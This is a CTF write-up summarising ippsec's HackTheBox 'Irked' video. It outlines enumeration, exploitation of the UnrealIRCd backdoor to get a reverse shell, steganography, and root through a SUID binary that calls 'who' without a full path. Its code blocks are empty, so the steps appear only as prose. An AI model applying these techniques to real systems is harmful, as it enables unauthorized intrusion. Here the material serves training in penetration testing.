Dissection of ippsec’s youtube video HackTheBox - Irked (Fixed). Box includes enumeration to UnrealIRCd server, stenography and tools, SUID stickybit that leads to root escalation.
Legal Usage: The information provided by execute@will is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risks/responsibilities.
This series of write-up will contain comprehensive write-ups of hackthebox machines. In an effort to sharpen reporting techniques and help solidify the understand and methodologies used during penetration testing.
YouTube Link: https://www.youtube.com/watch?v=OGFTM_qvtVI
Enumeration
Nmap scan
1 |
|
web-server
Check out web-server on port 80
since it says IRC move to perform full scan of box
full nmap scan
1 |
|
return to web-webserver
check out robots.txt
doesn’t exisit
check for ~root
- some apache servers allow this (old/not very often)
run gobuster
1 |
|
return to web-server
check /index.html
we get this main page. Establishing that the target is html.
try index.aspx
try Default.aspx
return to gobuster
discovered /manual
check out /manual
gives default apache page. Copywrite is 2014 which could me its old.
nmap full port scan
returned an open port of 8067
Begin to enumerate what this port is with nmap:
1 |
|
port is open with UnrealIRCd.
connect to port 8067
with ncat
1 |
|
since using the hostname we need to edit the ‘hosts’ on our local box to reflect
edit host file:
1 |
|
check that hostname works with firefox and for any virtual host routing issues.
IRCd banner information grab
google “RFC IRC”
connect to IRC with ncat and pass the parameters
1 |
|
Search for unrealirc change log for version name
end up finding multiple vulnerabilities
searchsploit UnrealIRC
1 |
|
metasploit backdoor command execution identified.
google “unrealirc backdoor” leads to Link: https://lwn.net/Articles/392201/ which describes exactly how the exploit works.
nutshell: Backdoor disguised to look like debug code:
moving forward without metasploit as now know how the exploit functions.
Setup tcpdump pipe to UnrealIRC
1 |
|
setup ping to UnrealIrc:
1 |
|
after connection to IRC timed out we got an execution of the ping (ICMP) that was captured on tcpdump.
Command Execution
from the realization that a ping can be sent via the “AB” exploit now move to create a reverse shell
setup listener & send reverse shell
1 |
|
reverse shell via IRC:
1 |
|
wait for timeout… which didn’t result in a shell.
retry but putting bash '
within the command just incase system is linked to nsh or dash
1 |
|
connection established and reverse shell.
upgrade shell
1 |
|
Enumerate box
print working directory
1 |
|
search directory:
check .bash_history
file:
1 |
|
found a cd djmardov
navigate to cd djmardov
check when kernal was compiled: uname -a
check for hidden files find . -ls
quite a few permission denied. find . -ls -type f
more permission denied.
discovered user.txt
check /Documents
we can not read because we are not djmardov
there is a .backup
and now we have a backup password for some stenography.
there has only been one image on this box the entire time and so now download locally
1 |
|
use steghide
if not installed download via:
1 |
|
most commonly use on CTFs:
1 |
|
ouputted a password file and a string
Priv-Esc
SSH Attempt as djmardov
1 |
|
check files
1 |
|
Looking for anything obvious.
return to user.txt
1 |
|
Enumeration with LinEnum
create local web server hosting the LinEnum
1 |
|
execute
1 |
|
SUID files that stick out have last been modified in “2018”
exim4 = mail server viewuser = interesting prospect
viewuser binary
Check SUID/sticky bit on /usr/bin/viewuser
1 |
|
indeed this binary has the ability to run as root.
Test the functionality of viewuser
copy binary off remote box via base64
1 |
|
(copy to clipboard)
decode base64 locally:
1 |
|
-could have been opened with Ghidra or Ida Pro opting to use strace
strace = list all sys calls
1 |
|
(difficult to read)
ltrace = another sys call outputer
1 |
|
the system(call) uses the variable “who” with no full path included which could lead to an entry to overwrite value. Which afterword changes the SUID and executes */tmp/listusers*
.
Modify /tmp/listusers
(target box)
1 |
|
change chmod to executable
1 |
|
which if executed launches a shell
Return to viewusers
who en turn will execute this file should launch a bash shell as root.
1 |
|
secondary exploit of “who” statement
what should be seen is “/usr/bin/who”
Locate who
1 |
|
change PATH
1 |
|
now we can edit who
1 |
|
change chmod to executable
1 |
|
did not priv-esc because the “who” calls the /bin/bash before the setuid(0) in the function causing it not to be vulnerable.
Loot&Root
don’t know who ippsec is? check him out at:
Youtube: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA Twitter: https://twitter.com/ippsec
#hailippsec